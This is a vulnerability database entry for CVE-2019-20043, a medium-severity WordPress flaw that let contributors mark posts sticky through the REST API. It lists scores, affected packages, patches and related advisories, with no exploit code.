CVE-2019-20043Improper Privilege Management in Wordpress

CWE-269Improper Privilege Management7 documents5 sources
Severity
4.3MEDIUMNVD
EPSS
1.2%
top 21.33%
CISA KEV
Not in KEV
Exploit
No known exploits
Affected products
3
WordpressDebian WordpressDebian Linux
Timeline
PublishedDec 27
Latest updateMay 24

Description

In in wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php in WordPress 3.7 to 5.3.0, authenticated users who do not have the rights to publish a post are able to mark posts as sticky or unsticky via the REST API. For example, the contributor role does not have such rights, but this allowed them to bypass that. This has been patched in WordPress 5.3.1, along with all the previous WordPress versions from 3.7 to 5.3 via a minor release.

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:NExploitability: 2.8 | Impact: 1.4

Affected Packages3 packages

debiandebian/wordpress< wordpress 5.3.2+dfsg1-1 (bookworm)
NVDwordpress/wordpress3.75.3.1
Debianwordpress/wordpress< 5.3.2+dfsg1-1+3

Also affects: Debian Linux 10.0, 9.0

Patches

Patch: core.trac.wordpress.orgPatch: core.trac.wordpress.org

🔴Vulnerability Details

2
GHSA
GHSA-ppxh-5qq2-77g8: WordPress before 52022-05-24
OSV
CVE-2019-20043: In in wp-includes/rest-api/endpoints/class-wp-rest-posts-controller2019-12-27

📋Vendor Advisories

1
Debian
CVE-2019-20043: wordpress - In in wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php in WordP...2019

💬Community

3
Bugzilla
CVE-2019-20043 wordpress: authenticated users who do not have the rights to publish a post are able to mark posts as sticky or unsticky via the REST API2020-01-21
Bugzilla
CVE-2019-20043 wordpress: authenticated users who do not have the rights to publish a post are able to mark posts as sticky or unsticky via the REST API [epel-7]2020-01-21
Bugzilla
CVE-2019-20043 wordpress: authenticated users who do not have the rights to publish a post are able to mark posts as sticky or unsticky via the REST API [epel-6]2020-01-21